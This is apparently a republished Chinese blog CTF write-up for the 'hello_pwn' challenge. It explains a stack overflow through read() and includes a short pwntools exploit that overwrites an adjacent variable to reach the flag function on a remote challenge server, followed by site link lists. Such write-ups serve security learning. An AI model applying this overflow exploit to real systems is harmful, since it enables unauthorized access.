hello_pwn--writeup

其他 2020-03-01 15:12:45 阅读次数: 0

文件下载地址：

链接：https://pan.baidu.com/s/1Qp1fxOU8b4VobwSIouK7OQ
提取码：g47i

0x01.分析

checksec：

64位程序，开启NX。

源码：

流程很简单，只要保证106c这个变量的值等于后面这个数字就可以了，前面有read函数，明显的栈溢出，只要想办法修改下面这个变量的值就行了。

发现这两个变量的差值为4，所以只需要溢出的时候填充四个字节的无效信息，再填充后面那个数字，就可去执行sub函数，拿到flag。

0x02.exp

##!/usr/bin/env python 
from pwn import*

r=remote("111.198.29.45",44362)
#r=process('./hellopwn')

payload=4*'A'+p64(1853186401)

r.recvuntil("bof")
r.sendline(payload)

r.interactive()

如颖随心-＞A

发布了76 篇原创文章 · 获赞 82 · 访问量 7079

私信关注

猜你喜欢

转载自blog.csdn.net/ATFWUS/article/details/104591776

hello_pwn--writeup

nuaactf hello_pwn writeup

hello pwn

Bugku旧平台pwn writeup

火种CTF PWN easyshellcode writeup

hello_pwn

xctf-pwn hello_pwn

攻防世界—pwn—hello_pwn

攻防世界-PWN-hello_pwn

NCTF-2018-PWN之假的真PWN的writeup

ISCC2018 Reverse & Pwn writeup

2018 百越杯 pwn(format WriteUp)

（PWN）NCTF2019 -- easy rop -- writeup

pwn-200（XDCTF-2015）--writeup

BJDCTF 2nd pwn Writeup

攻防世界pwn新手区writeup

buuoj Pwn writeup 31-40

buuoj Pwn writeup 21-30

buuoj Pwn writeup 11-20

攻防世界 | hello_pwn

攻防世界--hello_pwn

攻防世界_pwn_hello_pwn(萌新版)

pwn学习（1）攻防世界-hello_pwn

XCTF hello_pwn write up

【jarvisoj刷题之旅】pwn题目Tell Me Something的writeup

D0g3_Trash_Pwn_Writeup

2019 第十届 SWPUCTF writeup（Pwn）

2020数字中国虎符CTF-PWN-count writeup

第三届江西CTF reverse pwn writeup

【PWN系列】 Buucf babyheap_0ctf_2017 Writeup

今日推荐

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

面壁智能发布 Eurux-8x22B 开源大模型 —— 堪称「理科状元」

开源日报 | 谷歌扶持鸿蒙上位；开源Rabbit R1；Docker加持的安卓手机；微软的焦虑和野心；海尔电器把开放平台关了

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

周排行

Java自定义时间格式

同步整形电路

在开发中最最最常用的字符串的属性大集合

Linux 查看端口占用并杀掉

Java基础四：ArrayList

多线程之死锁就是这么简单

mysql 基础命令集

awk 命令详解

Centos6.3编译安装nginx+php步骤

OCR （Optical Character Recognition，光学字符识别）

每日归档

更多

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)